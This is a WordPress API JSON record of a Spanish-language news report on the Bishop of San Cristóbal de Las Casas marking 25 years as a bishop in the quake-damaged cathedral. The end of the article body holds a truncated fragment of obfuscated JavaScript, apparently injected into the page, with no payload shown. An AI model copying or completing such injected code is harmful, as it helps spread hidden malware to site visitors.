{"id":3967,"date":"2022-07-28T02:59:19","date_gmt":"2022-07-28T02:59:19","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3967"},"modified":"2022-07-28T02:59:20","modified_gmt":"2022-07-28T02:59:20","slug":"celebra-obispo-de-san-cristobal-25-anos-de-servicio-episcopal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3967","title":{"rendered":"Celebra Obispo de San Crist\u00f3bal 25 a\u00f1os de Servicio Episcopal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1012\" height=\"564\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220727-WA0069.jpg\" alt=\"\" class=\"wp-image-3968\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220727-WA0069.jpg 1012w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220727-WA0069-300x167.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220727-WA0069-768x428.jpg 768w\" sizes=\"auto, (max-width: 1012px) 100vw, 1012px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Con una celebraci\u00f3n Eucar\u00edstica, el obispo de la Di\u00f3cesis de San Crist\u00f3bal, Rodrigo Aguilar Mart\u00ednez, celebr\u00f3 sus 25 a\u00f1os de servicio episcopal en la Iglesia de la Catedral de San Crist\u00f3bal, el cual est\u00e1 a punto de ser entregado por Instituto Nacional de Antropolog\u00eda e Historia (INAH) y pues el inmueble ha estado cerrado por a\u00f1os, tras el sismo de 2017 que lo afect\u00f3 severamente.<\/p>\n\n\n\n<p>Durante la homil\u00eda, el sacerdote, record\u00f3 como a los 7 a\u00f1os tuvo la inquietud de entrar a la seminario y a los 10 a\u00f1os, ya estaba dentro, orden\u00e1ndose sacerdote a los 23 a\u00f1os, y obispo a los 45, \u201che estado en tres di\u00f3cesis, despu\u00e9s de la Di\u00f3cesis madre donde fui ordenado en Morelia, Michoac\u00e1n, inicie como obispo en Matehuala, al norte de San Luis Potos\u00ed despu\u00e9s de poco m\u00e1s de 8 a\u00f1os, trasladado a la Di\u00f3cesis de Tehuac\u00e1n en el oriente sureste de Puebla, y hace casi 5 a\u00f1os trasladado a la Di\u00f3cesis de San Crist\u00f3bal, en Chiapas\u201d.<\/p>\n\n\n\n<p>Ante la presencia de unos 50 personas feligreses e invitados especiales, ya que a\u00fan no hay acceso a todas las personas, en su mayor\u00eda del Pueblo Creyente, y resaltando la presencia de autoridades Victoria Cecilia Flores P\u00e9rez, en representaci\u00f3n del gobernador del estado, y Mariano Alberto D\u00edaz Ochoa, presidente municipal, el cat\u00f3lico dijo sentirse acuerpado por todos los sacerdotes, agentes pastorales, hermanas cristianas (o monjas) \u201ceso me reconforta, que no estoy solo\u201d.<\/p>\n\n\n\n<p>Refiri\u00f3 que tras su llegada a la Di\u00f3cesis, encontr\u00f3 una catedral \u201cbastante da\u00f1ada varias columnas desquebrajadas, que amenazaba que todo el techo se viniera abajo, de hecho se cambio completamente la techumbre, todo eso que vemos es nuevo, y ya los candiles limpiados, renovados los muros, retablos, y lo que estamos viendo que no ha concluido como signo de las m\u00e1s de 2 mil iglesias en el pa\u00eds, que quedaron da\u00f1adas en los sismos del 2017, como hay pendientes en esta iglesia, hay pendiente en otras del pa\u00eds\u201d.<\/p>\n\n\n\n<p>\u201cReconozco la acci\u00f3n del gobierno federal, estatal, municipal, y la feligres\u00eda que se une de muchas maneras, para que entre todos vayamos restaurando nuestros templos, ya se inaugur\u00f3 Santo Domingo, esta proceso Santa Luc\u00eda, Se inaugur\u00f3 San Francisco, de los m\u00e1s da\u00f1ados, ya otros estaban restaurados ates\u201d, abund\u00f3 Aguilar Mart\u00ednez.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- Con una celebraci\u00f3n Eucar\u00edstica, el obispo de la Di\u00f3cesis de San Crist\u00f3bal, Rodrigo Aguilar Mart\u00ednez, celebr\u00f3 sus 25 a\u00f1os de servicio episcopal en la Iglesia de la Catedral de San Crist\u00f3bal, el cual est\u00e1 a punto de ser entregado por Instituto Nacional de Antropolog\u00eda e Historia (INAH) y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3968,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-3967","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3967","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3967"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3967\/revisions"}],"predecessor-version":[{"id":3969,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3967\/revisions\/3969"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3968"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3967"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3967"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3967"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}